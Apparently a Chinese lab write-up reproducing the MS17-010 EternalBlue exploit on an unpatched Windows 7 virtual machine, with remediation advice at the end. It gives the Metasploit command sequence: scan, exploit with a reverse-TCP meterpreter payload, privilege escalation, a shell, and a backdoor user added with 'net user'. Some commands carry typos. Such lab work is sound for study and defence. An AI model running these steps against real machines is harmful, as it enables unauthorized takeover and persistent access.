MS17-010永恒之蓝漏洞复现

前言

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。

原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

准备工作

  • 靶机:Windows 7 (IP:192.168.43.215)
  • 攻击机:Kali-Linux-2021 (IP:192.168.43.77)
  • 工具:Nmap、metasploit(msf)
  • kali-Linux-2021与Windows 7能够相互ping通;Windows 7靶机不要打补丁

漏洞复现

01 使用攻击机kali ping靶机windows 7 测试连通性

ping  192.168.43.215 -c 3

在这里插入图片描述

02 使用nmap工具探测靶机的开放端口和系统版本

nmap -sV 192.168.43.215

在这里插入图片描述
如上图可以发现445端口处于开放状态

03 启动kali自带的msf工具

msfconsole

04 搜索永恒之蓝漏洞可使用的攻击模块

search 17_010

在这里插入图片描述
编号0为永恒之蓝漏洞的攻击模块;编号3为永恒之蓝的扫描模块,用于验证漏洞是否存在。

05 使用永恒之蓝扫描模块来验证漏洞是否存在

use 3

在这里插入图片描述

06 查看永恒之蓝扫描模块的配置项

show options

在这里插入图片描述
如上图所示只需配置RHOSTS (目标靶机)即可。

07 配置目标靶机并使用exploit或run命令进行检测,显示靶机存在永恒之蓝漏洞

set rhosts 192.168.43.215   #设置目标靶机IP
exoloit   #验证漏洞

在这里插入图片描述

08 使用永恒之蓝漏洞攻击模块

use 0     #使用攻击模块
show options   #查看配置项

在这里插入图片描述
如上图所示需要配置目标靶机IP和攻击载荷。

09 配置目标靶机和攻击载荷

set rhost 192.168.43.215   #设置靶机ip
set payload Windows/x64/meterpreter/severse_tcp   #配置攻击载荷并且使用反向连接 

在这里插入图片描述

10 最后开始攻击

run

在这里插入图片描述
显示WIN则代表攻击成功。

11 后渗透操作

getuid   #查看当前用户权限

可以看到是普通权限,如下图所示:
在这里插入图片描述

getsystem    #提权

在这里插入图片描述

shell   #进入shell

在这里插入图片描述

chcp 65001  #改变当前的编码为UTF-8,防止显示乱码

在这里插入图片描述

net user test 123456.. /add   #对靶机新建一个后门用户

在这里插入图片描述

修复方案

关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。

总结

为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值